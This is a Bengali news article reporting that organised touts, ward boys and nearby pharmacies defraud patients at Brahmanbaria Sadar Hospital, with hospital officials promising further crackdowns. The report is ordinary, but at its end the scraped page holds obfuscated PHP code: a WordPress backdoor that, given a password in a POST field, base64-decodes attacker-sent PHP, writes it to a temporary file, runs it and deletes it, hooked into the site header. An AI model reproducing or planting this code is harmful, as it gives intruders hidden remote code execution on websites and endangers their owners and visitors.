সোমবার, ১৭ই জুন, ২০২৪ খ্রিস্টাব্দ ৩রা আষাঢ়, ১৪৩১ বঙ্গাব্দ

ব্রাহ্মণবাড়ীয়া সদর হাসপাতালে দালালদের দৌরাত্ব চরম

IMG_20160613_144035আমিরজাদা চৌধুরী : ব্রাহ্মণবাড়ীয়া সদর হাসপাতালে ভিতরে সিএনজি অথবা রিস্কা থেকে নেমে রোগী জরুরী বিভাগের কাছে আসা মাএই প্রায় রোগীকে  অনেক প্রশ্নের সম্মুখীন হতে হয়। ভাই কোথায় থেকে এসেছেন, কি সমস্যা ? তখন অসহায় রোগীর লোকজন বলে ভাই আমাদের বাড়ি এই জায়গায়। আমাদের রোগীর এই সমস্যা, আর কথা বলা পর কিছু লোক অথবা  সুদর্শন শাড়ি পড়া  কিছু নারী হাতে মোবাইল সেবার নামে সবকিছু এক্ষণি সব ব্যবস্হা করে দিচ্ছি কোন চিন্তা করবেন না। এই যেন তাদের মানব সেবার এক মহা আশ্রম।

আর এভাবে প্রতারণার নয়া নয়া কৌশল নিয়ে এগিয়ে চলছে ২৫০ শয্যা বিশিষ্ট আধুনিক ব্রাহ্মণবাড়িয়া হাসাপাতলের সংঘবদ্ধ দালাল চক্র। কোন রোগী গ্রাম থেকে এসেছে, আর কোন রোগী শহর থেকে এসেছে সে সম্পর্কে দালালরা রোগী ঢুকা মাএই ধারণা নিয়ে পরিষ্কার হয়ে যায় । আর এভাবে সংঘ্য বদ্ধ দালাল চক্র প্রতিদিন নানা কৌশলে প্রতারণা করে অসহায় রোগীদের কাছ থেকে  হাতিয়ে নিচ্ছে হাজার হাজার টাকা। আর এ কাজে জড়িত হাসপাতালের আশে পাশের ফার্মেসী ও ডায়গনষ্ট্রিক সেন্টারের মালিকরা।

তবে দালাল চক্র উৎখাতের জন্য হাসপাতাল ভিতরে
কর্তৃপক্ষের তেমন কোন ভুমিকা নেই। প্রতিদিনই প্রতারিত মানুষের হাজারো অভিযোগ শুনা যায় হাসপাতাল চত্বর এলাকায়। প্রতারণার কৌশল মাঝে মধ্যে পরিবর্তন করে দালাল চক্র। কেই রোগীর পরিচয় নিয়ে তার সাথে ভাব জমিয়ে, আবার কেই রোগীর ভর্তি থেকে ওয়ার্ড পর্যন্ত নিয়ে তার সাথে সক্ষতা জমিয়ে প্রতারণা করে।

তবে নতুন কৌশল হিসেবে জরুরী বিভাগের সামনে দাড়িয়ে থাকা দালাল চক্র রোগীর লোকজনকে সহযোগিতা করে নিজের লোক বানিয়ে নিচ্ছে । আর এই কাজে তাদের  সাথে জড়িত হাসপাতালের কিছু ওয়ার্ড বয় আছে তা সরেজমিনে ঘুরে গোপন  সূএে জানা যায়।  যারা ওই দালালদের কাছ থেকে রোগি প্রতি কমিশন আদায় করে।তবে কমিশন না দিলে তাকে জরুরী বিভাগে অথবা ওয়ার্ডে প্রবেশ করতে দেয়া হয় না। এই যেন ক্ষমতা যার শাসন তার।

প্রতিদিন রিপ্রেজেনটিভ এসে হাসপাতালের দালালদের সাথে আতাত করে তাদের প্রতিষ্ঠানের  ব্যবসায়ীক ফায়দা লুটছে।এ ব্যাপারে নামে প্রকাশে অনিচ্ছুক এক দালাল জানান, কিছু বেসরকারী হাসপাতালের মালিকরা নিয়োমিত দালাল পোষেন। আর তাদের দেয়া  হয় মাসিক বেতন ও কমিশন। ফলে অতিরিক্ত টাকার আশায় বাধ্য হয়ে দালাল খাতায় নাম লেখায় অনেকে।
মনিপুরের  হাসমত আলী তার ছোট ছেলে রাফিককে নিয়ে এসেছে হাসপাতালে চিকিৎসা নিতে।সেখানে ভর্তি থেকে সকল কাজ করে দেন এক দালাল। কিন্তুু টাকা নেয় ৫০০ শত। অথচ শুনতাম সরকারী হাসপাতালে চিকিৎসা নিতে কোনটাকা লাগে না এখানে এসে দেখলাম তার আসলেই টাকা না দিলে ভাল সেবা পাওয়া সম্ভব না।এ ব্যাপারে সদর হাসপাতালের উদ্ধর্তন কতৃপক্ষ সাথে যোগাযোগ করা হলে তারা আমাদের কে বলেন,  মাঝে মাঝে দালাল উচ্ছেদ অভিযান চালানো হয়।তাদেরকে ভ্রাম্যমান আদালতের মাধ্যমে সাজাও দেয়া হয়। সাজা খেটে আবারো ফিরে আসে পুরানো পেশায়। তিনি  জানান, আবারো অচিরে অভিযান চালানো হবে।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}